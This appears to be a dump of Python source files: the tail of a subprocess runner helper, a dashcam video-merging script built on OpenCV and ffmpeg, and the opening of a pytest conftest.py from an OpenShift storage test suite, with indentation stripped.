self.capture_output = capture_output
self.completed: Optional[subprocess.CompletedProcess] = None
self.outs = None
self.errs = None
def pump_stderr(self):
self.errs = self.process.stderr.read()
def pump_stdout(self):
self.outs = self.process.stdout.read()
def run(self):
stderr_thread = threading.Thread(target=self.pump_stderr)
stderr_thread.start()
if self.capture_output:
stdout_thread = threading.Thread(target=self.pump_stdout)
stdout_thread.start()
self.process.wait()
stderr_thread.join()
if self.capture_output:
stdout_thread.join()
self.completed = subprocess.CompletedProcess(self.process.args,
self.process.returncode,
self.outs, self.errs)
self.process.stderr.close()
self.process.stdout.close()
def _write_binary_stderr(out_handle, contents):
# Fast-paths buffered text-io (which stderr is by default) while allowing
# full decode for non buffered and binary io.
if hasattr(out_handle, "buffer"):
out_handle.buffer.write(contents)
elif isinstance(out_handle, io.TextIOBase):
out_handle.write(contents.decode("utf-8"))
else:
out_handle.write(contents)
def _quote_command_line(command_line: List[str]) -> str:
return " ".join([shlex.quote(token) for token in command_line])
|
mitsuba.py
|
# -*- coding: utf-8 -*-
import ctypes
import os
import shutil
import cv2
import glob
import subprocess
import signal
from pydub import AudioSegment
from collections import defaultdict
from tqdm import tqdm
from multiprocessing import Process, Queue, Value, Pipe
from queue import Empty
from logging import getLogger, StreamHandler, Formatter, FileHandler, getLevelName
from config import *
def setup_logger(modname):
log_level = getLevelName(LOG_LEVEL)
logger = getLogger(modname)
logger.setLevel(log_level)
sh = StreamHandler()
sh.setLevel(log_level)
formatter = Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(message)s')
sh.setFormatter(formatter)
logger.addHandler(sh)
fh = FileHandler("error.log") # fh = file handler
fh.setLevel(log_level)
fh_formatter = Formatter(
'%(asctime)s - %(filename)s - %(name)s - %(lineno)d - %(levelname)s - %(message)s')
fh.setFormatter(fh_formatter)
logger.addHandler(fh)
return logger
logger = setup_logger(__name__)
def merge_video(movie_files, key_name, send_end):
tmp_video_file = os.path.join(TMP_DIR, f"tmp_v_{key_name}.mp4")
debug_1 = ""
try:
# 形式はmp4
fourcc = cv2.VideoWriter_fourcc('m', 'p', '4', 'v')
#動画情報の取得
movie = cv2.VideoCapture(movie_files[0])
fps = movie.get(cv2.CAP_PROP_FPS)
height = movie.get(cv2.CAP_PROP_FRAME_HEIGHT)
width = movie.get(cv2.CAP_PROP_FRAME_WIDTH)
# 出力先のファイルを開く
out = cv2.VideoWriter(tmp_video_file, int(fourcc), fps,
(int(width), int(height)))
for i, movies in enumerate(movie_files):
debug_1 = movies
# 動画ファイルの読み込み,引数はビデオファイルのパス
movie = cv2.VideoCapture(movies)
count = movie.get(cv2.CAP_PROP_FRAME_COUNT)
frames = []
if movie.isOpened() == False: # 正常に動画ファイルを読み込めたか確認
continue
for _ in range(int(count)):
ret, tmp_f = movie.read() # read():1コマ分のキャプチャ画像データを読み込む
if ret:
frames.append(tmp_f)
# 読み込んだフレームを書き込み
if i == 0:
[out.write(f) for f in frames]
else:
[out.write(f) for f in frames[DUP_FRAME:]]
except Exception as e:
logger.error(e)
logger.error(debug_1)
out.release()
send_end.send((tmp_video_file, height))
def merge_audio(movie_files, key_name, send_end):
tmp_audio_file_sub = os.path.join(TMP_DIR, f"tmp_a_{key_name}_sub.wav")
tmp_audio_file = os.path.join(TMP_DIR, f"tmp_a_{key_name}.wav")
audio_merged = AudioSegment.empty()
for i, movies in enumerate(movie_files):
command = f"ffmpeg -y -i {movies} -vn -loglevel quiet {tmp_audio_file_sub}"
subprocess.run(command, shell=True)
audio_tmp = AudioSegment.from_file(tmp_audio_file_sub, format="wav")
if i == 0:
audio_merged += audio_tmp
else:
audio_merged += audio_tmp[DUP_AUDIO:]
# 結合した音声書き出し
audio_merged.export(tmp_audio_file, format="wav")
os.remove(tmp_audio_file_sub)
send_end.send(tmp_audio_file)
def encode_movie(key_name, video_file, height, audio_file):
filename = os.path.join(TMP_DIR, f"{key_name}.mp4")
# 動画と音声結合
vf = VIDEO_FILTER
cv = f"-c:v {VIDEO_CODEC}"
# ビットレートは解像度に応じて固定にしています。
if height == 1080: # FHD
bv = f"-b:v {VIDEO_BR_1}"
elif height == 720: # HD
bv = f"-b:v {VIDEO_BR_2}"
else: # VGA
bv = f"-b:v {VIDEO_BR_3}"
loglevel = "-loglevel quiet"
command = f"ffmpeg -y -i {video_file} -i {audio_file} {cv} {bv} {vf} -c:a aac {loglevel} {filename}"
subprocess.run(command, shell=True)
os.remove(video_file)
os.remove(audio_file)
def transfer(tran_q, merge_q, end_sw):
# ネットワーク越しなどの場合に一旦ローカルにコピーするための処理
while not end_sw.value:
try:
files_list, key_name, _ = tran_q.get(timeout=30)
files_list_t = []
for f in files_list:
if INPUT_FILE_COPY:
copy_to_path = os.path.join(TMP_DIR, f.split("/")[-1])
if not os.path.exists(copy_to_path):
shutil.copy(f, copy_to_path)
files_list_t.append(copy_to_path)
else:
files_list_t.append(f)
merge_q.put((files_list_t ,key_name))
except Empty:
continue
def merger(merge_q, encode_q, end_sw):
while not end_sw.value:
try:
files_list, key_name = merge_q.get(timeout=30)
recv_end_v, send_end_v = Pipe(False)
recv_end_a, send_end_a = Pipe(False)
proc_v = Process(target=merge_video, args=(
files_list, key_name, send_end_v))
proc_a = Process(target=merge_audio, args=(
files_list, key_name, send_end_a))
proc_v.start()
proc_a.start()
proc_v.join()
proc_a.join()
if INPUT_FILE_COPY:
for f in files_list:
os.remove(f)
tmp_video_file, height = recv_end_v.recv()
tmp_audio_file = recv_end_a.recv()
encode_q.put((key_name, tmp_video_file, height, tmp_audio_file))
except Empty:
continue
def encoder(encode_q, tran2_q, end_sw):
while not end_sw.value:
try:
key_name, tmp_video_file, height, tmp_audio_file = encode_q.get(timeout=30)
encode_movie(key_name, tmp_video_file, height, tmp_audio_file)
tran2_q.put(key_name)
except Empty:
continue
def transfer2(tran2_q, tqdm_q, end_sw):
while not end_sw.value:
try:
key_name = tran2_q.get(timeout=30)
copy_from_path = os.path.join(TMP_DIR, f"{key_name}.mp4")
copy_to_path = os.path.join(OUT_DIR, f"{key_name}.mp4")
try:
shutil.copy(copy_from_path, copy_to_path)
os.remove(copy_from_path)
except Exception as e:
logger.error(e)
continue
tqdm_q.put(key_name)
except Empty:
continue
def progress(tqdm_q, size, pcnt, end_sw):
with tqdm(total=size) as t:
while size > pcnt.value:
key_name = tqdm_q.get()
t.set_description(f"{key_name} finished")
t.update(1)
pcnt.value += 1
end_sw.value = True
if __name__ == '__main__':
os.makedirs(TMP_DIR, exist_ok=True)
os.makedirs(OUT_DIR, exist_ok=True)
tran_q = Queue()
merge_q = Queue(maxsize=MERGE_WORKERS*4)
encode_q = Queue(maxsize=ENCODE_WORKERS*4)
tran2_q = Queue()
tqdm_q = Queue()
pcnt = Value(ctypes.c_int)
pcnt.value = 0
end_sw = Value(ctypes.c_bool)
end_sw.value = False
# ディレクトリ内の動画を:フロント・リアカメラごと、撮影開始時間ごとにまとめる
files_dict = defaultdict(list)
for f in glob.glob(os.path.join(IN_DIR, "*.MP4")):
files_dict["_".join(f.split("/")[-1].split("_")[:2])].append(f)
data = []
for i, (key_name, files_list) in enumerate(files_dict.items()):
if not os.path.exists(os.path.join(OUT_DIR, f"{key_name}.mp4")):
data.append((sorted(files_list), key_name, i))
[tran_q.put(q) for q in data]
proc_tran = Process(target=transfer, args=(tran_q, merge_q, end_sw))
proc_tran.start()
proc_merg = [Process(target=merger, args=(merge_q, encode_q, end_sw))
for _ in range(MERGE_WORKERS)]
[p.start() for p in proc_merg]
proc_enc = [Process(target=encoder, args=(encode_q, tran2_q, end_sw))
for _ in range(ENCODE_WORKERS)]
[p.start() for p in proc_enc]
proc_tran2 = Process(target=transfer2, args=(tran2_q, tqdm_q, end_sw))
proc_tran2.start()
proc_tqdm = Process(target=progress, args=(tqdm_q, len(data), pcnt, end_sw))
proc_tqdm.start()
proc_tran.join()
[p.join() for p in proc_merg]
[p.join() for p in proc_enc]
proc_tqdm.join()
proc_tran2.join()
shutil.rmtree(TMP_DIR)
|
conftest.py
|
import logging
import os
import random
import time
import tempfile
import threading
from concurrent.futures.thread import ThreadPoolExecutor
from datetime import datetime
from math import floor
from shutil import copyfile
from functools import partial
from botocore.exceptions import ClientError
import pytest
from collections import namedtuple
from ocs_ci.deployment import factory as dep_factory
from ocs_ci.framework import config
from ocs_ci.framework.pytest_customization.marks import (
deployment,
ignore_leftovers,
tier_marks,
ignore_leftover_label,
)
from ocs_ci.ocs import constants, defaults, fio_artefacts, node, ocp, platform_nodes
from ocs_ci.ocs.bucket_utils import craft_s3_command
from ocs_ci.ocs.exceptions import (
CommandFailed,
TimeoutExpiredError,
CephHealthException,
ResourceWrongStatusException,
UnsupportedPlatformError,
PoolDidNotReachReadyState,
StorageclassNotCreated,
PoolNotDeletedFromUI,
StorageClassNotDeletedFromUI,
)
from ocs_ci.ocs.mcg_workload import mcg_job_factory as mcg_job_factory_implementation
from ocs_ci.ocs.node import get_node_objs, schedule_nodes
from ocs_ci.ocs.ocp import OCP
from ocs_ci.ocs.resources import pvc
from ocs_ci.ocs.utils import setup_ceph_toolbox, collect_ocs_logs
from ocs_ci.ocs.resources.backingstore import (
backingstore_factory as backingstore_factory_implementation,
)
from ocs_ci.ocs.resources.namespacestore import (
namespace_store_factory as namespacestore_factory_implementation,
)
from ocs_ci.ocs.resources.bucketclass import (
bucket_class_factory as bucketclass_factory_implementation,
)
from ocs_ci.ocs.resources.cloud_manager import CloudManager
from ocs_ci.ocs.resources.cloud_uls import (
cloud_uls_factory as cloud_uls_factory_implementation,
)
from ocs_ci.ocs.node import check_nodes_specs
from ocs_ci.ocs.resources.mcg import MCG
from ocs_ci.ocs.resources.objectbucket import BUCKET_MAP
from ocs_ci.ocs.resources.ocs import OCS
from ocs_ci.ocs.resources.pod import (
get_rgw_pods,
delete_deploymentconfig_pods,
get_pods_having_label,
get_deployments_having_label,
Pod,
)
from ocs_ci.ocs.resources.pvc import PVC, create_restore_pvc
from ocs_ci.ocs.version import get_ocs_version, report_ocs_version
from ocs_ci.ocs.cluster_load import ClusterLoad, wrap_msg
from ocs_ci.utility import (
aws,
deployment_openshift_logging as ocp_logging_obj,
ibmcloud,
kms as KMS,
reporting,
templating,
users,
)
from ocs_ci.utility.environment_check import (
get_status_before_execution,
get_status_after_execution,
)
from ocs_ci.utility.flexy import load_cluster_info
from ocs_ci.utility.kms import is_kms_enabled
from ocs_ci.utility.prometheus import PrometheusAPI
from ocs_ci.utility.uninstall_openshift_logging import uninstall_cluster_logging
from ocs_ci.utility.utils import (
ceph_health_check,
ceph_health_check_base,
get_running_ocp_version,
get_openshift_client,
get_system_architecture,
get_testrun_name,
load_auth_config,
ocsci_log_path,
skipif_ocp_version,
skipif_ocs_version,
TimeoutSampler,
skipif_upgraded_from,
update_container_with_mirrored_image,
skipif_ui_not_support,
)
from ocs_ci.helpers import helpers
from ocs_ci.helpers.helpers import (
create_unique_resource_name,
create_ocs_object_from_kind_and_name,
setup_pod_directories,
get_current_test_name,
)
from ocs_ci.ocs.bucket_utils import get_rgw_restart_counts
from ocs_ci.ocs.pgsql import Postgresql
from ocs_ci.ocs.resources.rgw import RGW
from ocs_ci.ocs.jenkins import Jenkins
from ocs_ci.ocs.amq import AMQ
from ocs_ci.ocs.elasticsearch import ElasticSearch
from ocs_ci.ocs.ui.base_ui import login_ui, close_browser
from ocs_ci.ocs.ripsaw import RipSaw
from ocs_ci.ocs.ui.block_pool import BlockPoolUI
from ocs_ci.ocs.ui.storageclass import StorageClassUI
from ocs_ci.ocs.couchbase_new import CouchBase
log = logging.getLogger(__name__)
class OCSLogFormatter(logging.Formatter):
def __init__(self):
fmt = (
"%(asctime)s - %(threadName)s - %(levelname)s - %(name)s.%(funcName)s.%(lineno)d "
"- %(message)s"
)
super(OCSLogFormatter, self).__init__(fmt)
def pytest_logger_config(logger_config):
logger_config.add_loggers([""], stdout_level="info")
logger_config.set_log_option_default("")
logger_config.split_by_outcome()
logger_config.set_formatter_class(OCSLogFormatter)
def pytest_collection_modifyitems(session, items):
"""
A pytest hook to filter out skipped tests satisfying
skipif_ocs_version, skipif_upgraded_from or skipif_no_kms
Args:
session: pytest session
config: pytest config object
items: list of collected tests
"""
teardown = config.RUN["cli_params"].get("teardown")
deploy = config.RUN["cli_params"].get("deploy")
skip_ocs_deployment = config.ENV_DATA["skip_ocs_deployment"]
# Add squad markers to each test item based on filepath
for item in items:
# check, if test already have squad marker manually assigned
if any(map(lambda x: "_squad" in x.name, item.iter_markers())):
continue
for squad, paths in constants.SQUADS.items():
for _path in paths:
# Limit the test_path to the tests directory
test_path = os.path.relpath(item.fspath.strpath, constants.TOP_DIR)
if _path in test_path:
item.add_marker(f"{squad.lower()}_squad")
item.user_properties.append(("squad", squad))
break
if not (teardown or deploy or skip_ocs_deployment):
for item in items[:]:
skipif_ocp_version_marker = item.get_closest_marker("skipif_ocp_version")
skipif_ocs_version_marker = item.get_closest_marker("skipif_ocs_version")
skipif_upgraded_from_marker = item.get_closest_marker(
"skipif_upgraded_from"
)
skipif_no_kms_marker = item.get_closest_marker("skipif_no_kms")
skipif_ui_not_support_marker = item.get_closest_marker(
"skipif_ui_not_support"
)
if skipif_ocp_version_marker:
skip_condition = skipif_ocp_version_marker.args
# skip_condition will be a tuple
# and condition will be first element in the tuple
if skipif_ocp_version(skip_condition[0]):
log.info(
f"Test: {item} will be skipped due to OCP {skip_condition}"
)
items.remove(item)
continue
if skipif_ocs_version_marker:
skip_condition = skipif_ocs_version_marker.args
# skip_condition will be a tuple
# and condition will be first element in the tuple
if skipif_ocs_version(skip_condition[0]):
log.info(f"Test: {item} will be skipped due to {skip_condition}")
items.remove(item)
continue
if skipif_upgraded_from_marker:
skip_args = skipif_upgraded_from_marker.args
if skipif_upgraded_from(skip_args[0]):
log.info(
f"Test: {item} will be skipped because the OCS cluster is"
f" upgraded from one of these versions: {skip_args[0]}"
)
items.remove(item)
if skipif_no_kms_marker:
try:
if not is_kms_enabled():
log.info(
f"Test: {item} it will be skipped because the OCS cluster"
f" has not configured cluster-wide encryption with KMS"
)
items.remove(item)
except KeyError:
log.warning(
"Cluster is not yet installed. Skipping skipif_no_kms check."
)
if skipif_ui_not_support_marker:
skip_condition = skipif_ui_not_support_marker
if skipif_ui_not_support(skip_condition.args[0]):
log.info(
f"Test: {item} will be skipped due to UI test {skip_condition.args} is not available"
)
items.remove(item)
continue
# skip UI test on openshift dedicated ODF-MS platform
if (
config.ENV_DATA["platform"].lower() == constants.OPENSHIFT_DEDICATED_PLATFORM
or config.ENV_DATA["platform"].lower() == constants.ROSA_PLATFORM
):
for item in items.copy():
if "/ui/" in str(item.fspath):
log.info(
f"Test {item} is removed from the collected items"
f" UI is not supported on {config.ENV_DATA['platform'].lower()}"
)
items.remove(item)
@pytest.fixture()
def supported_configuration():
"""
Check that cluster nodes have enough CPU and Memory as described in:
https://access.redhat.com/documentation/en-us/red_hat_openshift_container_storage/4.2/html-single/planning_your_deployment/index#infrastructure-requirements_rhocs
This fixture is intended as a prerequisite for tests or fixtures that
run flaky on configurations that don't meet minimal requirements.
Minimum requirements for each starting node (OSD+MON):
16 CPUs
64 GB memory
Last documentation check: 2020-02-21
"""
min_cpu = constants.MIN_NODE_CPU
min_memory = constants.MIN_NODE_MEMORY
log.info("Checking if system meets minimal requirements")
if not check_nodes_specs(min_memory=min_memory, min_cpu=min_cpu):
err_msg = (
f"At least one of the worker nodes doesn't meet the "
f"required minimum specs of {min_cpu} vCPUs and {min_memory} RAM"
)
pytest.xfail(err_msg)
@pytest.fixture(scope="session", autouse=True)
def auto_load_auth_config():
try:
auth_config = {"AUTH": load_auth_config()}
config.update(auth_config)
except FileNotFoundError:
pass # If auth file doesn't exist we just ignore.
@pytest.fixture(scope="class")
def secret_factory_class(request):
return secret_factory_fixture(request)
@pytest.fixture(scope="session")
def secret_factory_session(request):
return secret_factory_fixture(request)
@pytest.fixture(scope="function")
def secret_factory(request):
return secret_factory_fixture(request)
def secret_factory_fixture(request):
"""
Secret factory. Calling this fixture creates a new secret.
RBD based is default.
** This method should not be used anymore **
** This method is for internal testing only **
"""
instances = []
def factory(interface=constants.CEPHBLOCKPOOL):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
"""
secret_obj = helpers.create_secret(interface_type=interface)
assert secret_obj, "Failed to create a secret"
instances.append(secret_obj)
return secret_obj
def finalizer():
"""
Delete the RBD secrets
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="session", autouse=True)
def log_ocs_version(cluster):
"""
Fixture handling version reporting for OCS.
This fixture handles alignment of the version reporting, so that we:
* report version for each test run (no matter if just deployment, just
test or both deployment and tests are executed)
* prevent conflict of version reporting with deployment/teardown (eg. we
should not run the version logging before actual deployment, or after
a teardown)
Version is reported in:
* log entries of INFO log level during test setup phase
* ocs_version file in cluster path directory (for copy pasting into bug
reports)
"""
teardown = config.RUN["cli_params"].get("teardown")
deploy = config.RUN["cli_params"].get("deploy")
dev_mode = config.RUN["cli_params"].get("dev_mode")
skip_ocs_deployment = config.ENV_DATA["skip_ocs_deployment"]
if teardown and not deploy:
log.info("Skipping version reporting for teardown.")
return
elif dev_mode:
log.info("Skipping version reporting for development mode.")
return
elif skip_ocs_deployment:
log.info("Skipping version reporting since OCS deployment is skipped.")
return
cluster_version, image_dict = get_ocs_version()
file_name = os.path.join(
config.ENV_DATA["cluster_path"], "ocs_version." + datetime.now().isoformat()
)
with open(file_name, "w") as file_obj:
report_ocs_version(cluster_version, image_dict, file_obj)
log.info("human readable ocs version info written into %s", file_name)
@pytest.fixture(scope="class")
def ceph_pool_factory_class(request, replica=3, compression=None):
return ceph_pool_factory_fixture(request, replica=replica, compression=compression)
@pytest.fixture(scope="session")
def ceph_pool_factory_session(request, replica=3, compression=None):
return ceph_pool_factory_fixture(request, replica=replica, compression=compression)
@pytest.fixture(scope="function")
def ceph_pool_factory(request, replica=3, compression=None):
return ceph_pool_factory_fixture(request, replica=replica, compression=compression)
def ceph_pool_factory_fixture(request, replica=3, compression=None):
"""
Create a Ceph pool factory.
Calling this fixture creates new Ceph pool instance.
** This method should not be used anymore **
** This method is for internal testing only **
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL, replica=replica, compression=compression
):
if interface == constants.CEPHBLOCKPOOL:
ceph_pool_obj = helpers.create_ceph_block_pool(
replica=replica, compression=compression
)
elif interface == constants.CEPHFILESYSTEM:
cfs = ocp.OCP(
kind=constants.CEPHFILESYSTEM, namespace=defaults.ROOK_CLUSTER_NAMESPACE
).get(defaults.CEPHFILESYSTEM_NAME)
ceph_pool_obj = OCS(**cfs)
assert ceph_pool_obj, f"Failed to create {interface} pool"
if interface != constants.CEPHFILESYSTEM:
instances.append(ceph_pool_obj)
return ceph_pool_obj
def finalizer():
"""
Delete the Ceph block pool
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def storageclass_factory_class(request, ceph_pool_factory_class, secret_factory_class):
return storageclass_factory_fixture(
request, ceph_pool_factory_class, secret_factory_class
)
@pytest.fixture(scope="session")
def storageclass_factory_session(
request, ceph_pool_factory_session, secret_factory_session
):
return storageclass_factory_fixture(
request, ceph_pool_factory_session, secret_factory_session
)
@pytest.fixture(scope="function")
def storageclass_factory(request, ceph_pool_factory, secret_factory):
return storageclass_factory_fixture(request, ceph_pool_factory, secret_factory)
def storageclass_factory_fixture(
request,
ceph_pool_factory,
secret_factory,
):
"""
Create a storage class factory. Default is RBD based.
Calling this fixture creates new storage class instance.
** This method should not be used anymore **
** This method is for internal testing only **
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL,
secret=None,
custom_data=None,
sc_name=None,
reclaim_policy=constants.RECLAIM_POLICY_DELETE,
replica=3,
compression=None,
new_rbd_pool=False,
pool_name=None,
rbd_thick_provision=False,
encrypted=False,
encryption_kms_id=None,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
secret (object): An OCS instance for the secret.
custom_data (dict): If provided then storageclass object is created
by using these data. Parameters `block_pool` and `secret`
are not useds but references are set if provided.
sc_name (str): Name of the storage class
replica (int): Replica size for a pool
compression (str): Compression type option for a pool
new_rbd_pool (bool): True if user wants to create new rbd pool for SC
pool_name (str): Existing pool name to create the storageclass other
then the default rbd pool.
rbd_thick_provision (bool): True to enable RBD thick provisioning.
Applicable if interface is CephBlockPool
encrypted (bool): True to enable RBD PV encryption
encryption_kms_id (str): Key value of vault config to be used from
csi-kms-connection-details configmap
Returns:
object: helpers.create_storage_class instance with links to
block_pool and secret.
"""
if custom_data:
sc_obj = helpers.create_resource(**custom_data)
else:
secret = secret or secret_factory(interface=interface)
if interface == constants.CEPHBLOCKPOOL:
if config.ENV_DATA.get("new_rbd_pool") or new_rbd_pool:
pool_obj = ceph_pool_factory(
interface=interface,
replica=config.ENV_DATA.get("replica") or replica,
compression=config.ENV_DATA.get("compression") or compression,
)
interface_name = pool_obj.name
else:
if pool_name is None:
interface_name = helpers.default_ceph_block_pool()
else:
interface_name = pool_name
elif interface == constants.CEPHFILESYSTEM:
interface_name = helpers.get_cephfs_data_pool_name()
sc_obj = helpers.create_storage_class(
interface_type=interface,
interface_name=interface_name,
secret_name=secret.name,
sc_name=sc_name,
reclaim_policy=reclaim_policy,
rbd_thick_provision=rbd_thick_provision,
encrypted=encrypted,
encryption_kms_id=encryption_kms_id,
)
assert sc_obj, f"Failed to create {interface} storage class"
sc_obj.secret = secret
instances.append(sc_obj)
return sc_obj
def finalizer():
"""
Delete the storageclass
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def project_factory_class(request):
return project_factory_fixture(request)
@pytest.fixture(scope="session")
def project_factory_session(request):
return project_factory_fixture(request)
@pytest.fixture()
def project_factory(request):
return project_factory_fixture(request)
@pytest.fixture()
def project(project_factory):
"""
This fixture creates a single project instance.
"""
project_obj = project_factory()
return project_obj
def project_factory_fixture(request):
"""
Create a new project factory.
Calling this fixture creates new project.
"""
instances = []
def factory(project_name=None):
"""
Args:
project_name (str): The name for the new project
Returns:
object: ocs_ci.ocs.resources.ocs instance of 'Project' kind.
"""
proj_obj = helpers.create_project(project_name=project_name)
instances.append(proj_obj)
return proj_obj
def finalizer():
delete_projects(instances)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="function")
def teardown_project_factory(request):
return teardown_project_factory_fixture(request)
def teardown_project_factory_fixture(request):
"""
Tearing down a project that was created during the test
To use this factory, you'll need to pass 'teardown_project_factory' to your test
function and call it in your test when a new project was created and you
want it to be removed in teardown phase:
def test_example(self, teardown_project_factory):
project_obj = create_project(project_name="xyz")
teardown_project_factory(project_obj)
"""
instances = []
def factory(resource_obj):
"""
Args:
resource_obj (OCP object or list of OCP objects) : Object to teardown after the test
"""
if isinstance(resource_obj, list):
instances.extend(resource_obj)
else:
instances.append(resource_obj)
def finalizer():
delete_projects(instances)
request.addfinalizer(finalizer)
return factory
def delete_projects(instances):
"""
Delete the project
instances (list): list of OCP objects (kind is Project)
"""
for instance in instances:
try:
ocp_event = ocp.OCP(kind="Event", namespace=instance.namespace)
events = ocp_event.get()
event_count = len(events["items"])
warn_event_count = 0
for event in events["items"]:
if event["type"] == "Warning":
warn_event_count += 1
log.info(
(
"There were %d events in %s namespace before it's"
" removal (out of which %d were of type Warning)."
" For a full dump of this event list, see DEBUG logs."
),
event_count,
instance.namespace,
warn_event_count,
)
except Exception:
# we don't want any problem to disrupt the teardown itself
log.exception("Failed to get events for project %s", instance.namespace)
ocp.switch_to_default_rook_cluster_project()
instance.delete(resource_name=instance.namespace)
instance.wait_for_delete(instance.namespace, timeout=300)
@pytest.fixture(scope="class")
def pvc_factory_class(request, project_factory_class):
return pvc_factory_fixture(request, project_factory_class)
@pytest.fixture(scope="session")
def pvc_factory_session(request, project_factory_session):
return pvc_factory_fixture(request, project_factory_session)
@pytest.fixture(scope="function")
def pvc_factory(request, project_factory):
return pvc_factory_fixture(
request,
project_factory,
)
def pvc_factory_fixture(request, project_factory):
"""
Create a persistent Volume Claim factory. Calling this fixture creates new
PVC. For custom PVC provide 'storageclass' parameter.
"""
instances = []
active_project = None
active_rbd_storageclass = None
active_cephfs_storageclass = None
def factory(
interface=constants.CEPHBLOCKPOOL,
project=None,
storageclass=None,
size=None,
access_mode=constants.ACCESS_MODE_RWO,
custom_data=None,
status=constants.STATUS_BOUND,
volume_mode=None,
size_unit="Gi",
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
project (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'Project' kind.
storageclass (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'StorageClass' kind.
size (int): The requested size for the PVC
access_mode (str): ReadWriteOnce, ReadOnlyMany or ReadWriteMany.
This decides the access mode to be used for the PVC.
ReadWriteOnce is default.
custom_data (dict): If provided then PVC object is created
by using these data. Parameters `project` and `storageclass`
are not used but reference is set if provided.
status (str): If provided then factory waits for object to reach
desired state.
volume_mode (str): Volume mode for PVC.
eg: volume_mode='Block' to create rbd `block` type volume
size_unit (str): PVC size unit, eg: "Mi"
Returns:
object: helpers.create_pvc instance.
"""
if custom_data:
pvc_obj = PVC(**custom_data)
pvc_obj.create(do_reload=False)
else:
nonlocal active_project
nonlocal active_rbd_storageclass
nonlocal active_cephfs_storageclass
project = project or active_project or project_factory()
active_project = project
if interface == constants.CEPHBLOCKPOOL:
storageclass = storageclass or helpers.default_storage_class(
interface_type=interface
)
active_rbd_storageclass = storageclass
elif interface == constants.CEPHFILESYSTEM:
storageclass = storageclass or helpers.default_storage_class(
interface_type=interface
)
active_cephfs_storageclass = storageclass
pvc_size = f"{size}{size_unit}" if size else None
pvc_obj = helpers.create_pvc(
sc_name=storageclass.name,
namespace=project.namespace,
size=pvc_size,
do_reload=False,
access_mode=access_mode,
volume_mode=volume_mode,
)
assert pvc_obj, "Failed to create PVC"
if status:
helpers.wait_for_resource_state(pvc_obj, status)
pvc_obj.storageclass = storageclass
pvc_obj.project = project
pvc_obj.access_mode = access_mode
instances.append(pvc_obj)
return pvc_obj
def finalizer():
"""
Delete the PVC
"""
pv_objs = []
# Get PV form PVC instances and delete PVCs
for instance in instances:
if not instance.is_deleted:
pv_objs.append(instance.backed_pv_obj)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
# Wait for PVs to delete
# If they have ReclaimPolicy set to Retain then delete them manually
for pv_obj in pv_objs:
if (
pv_obj.data.get("spec").get("persistentVolumeReclaimPolicy")
== constants.RECLAIM_POLICY_RETAIN
):
helpers.wait_for_resource_state(pv_obj, constants.STATUS_RELEASED)
pv_obj.delete()
pv_obj.ocp.wait_for_delete(pv_obj.name)
else:
pv_obj.ocp.wait_for_delete(resource_name=pv_obj.name, timeout=180)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def pod_factory_class(request, pvc_factory_class):
return pod_factory_fixture(request, pvc_factory_class)
@pytest.fixture(scope="session")
def pod_factory_session(request, pvc_factory_session):
return pod_factory_fixture(request, pvc_factory_session)
@pytest.fixture(scope="function")
def pod_factory(request, pvc_factory):
return pod_factory_fixture(request, pvc_factory)
def pod_factory_fixture(request, pvc_factory):
"""
Create a Pod factory. Calling this fixture creates new Pod.
For custom Pods provide 'pvc' parameter.
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL,
pvc=None,
custom_data=None,
status=constants.STATUS_RUNNING,
node_name=None,
pod_dict_path=None,
raw_block_pv=False,
deployment_config=False,
service_account=None,
replica_count=1,
command=None,
command_args=None,
subpath=None,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
pvc (PVC object): ocs_ci.ocs.resources.pvc.PVC instance kind.
custom_data (dict): If provided then Pod object is created
by using these data. Parameter `pvc` is not used but reference
is set if provided.
status (str): If provided then factory waits for object to reach
desired state.
node_name (str): The name of specific node to schedule the pod
pod_dict_path (str): YAML path for the pod.
raw_block_pv (bool): True for creating raw block pv based pod,
False otherwise.
deployment_config (bool): True for DeploymentConfig creation,
False otherwise
service_account (OCS): Service account object, in case DeploymentConfig
is to be created
replica_count (int): The replica count for deployment config
command (list): The command to be executed on the pod
command_args (list): The arguments to be sent to the command running
on the pod
subpath (str): Value of subPath parameter in pod yaml
Returns:
object: helpers.create_pod instance
"""
sa_name = service_account.name if service_account else None
if custom_data:
pod_obj = helpers.create_resource(**custom_data)
else:
pvc = pvc or pvc_factory(interface=interface)
pod_obj = helpers.create_pod(
pvc_name=pvc.name,
namespace=pvc.namespace,
interface_type=interface,
node_name=node_name,
pod_dict_path=pod_dict_path,
raw_block_pv=raw_block_pv,
dc_deployment=deployment_config,
sa_name=sa_name,
replica_count=replica_count,
command=command,
command_args=command_args,
subpath=subpath,
)
assert pod_obj, "Failed to create pod"
if deployment_config:
dc_name = pod_obj.get_labels().get("name")
dc_ocp_dict = ocp.OCP(
kind=constants.DEPLOYMENTCONFIG, namespace=pod_obj.namespace
).get(resource_name=dc_name)
dc_obj = OCS(**dc_ocp_dict)
instances.append(dc_obj)
else:
instances.append(pod_obj)
if status:
helpers.wait_for_resource_state(pod_obj, status, timeout=300)
pod_obj.reload()
pod_obj.pvc = pvc
if deployment_config:
return dc_obj
return pod_obj
def finalizer():
"""
Delete the Pod or the DeploymentConfig
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
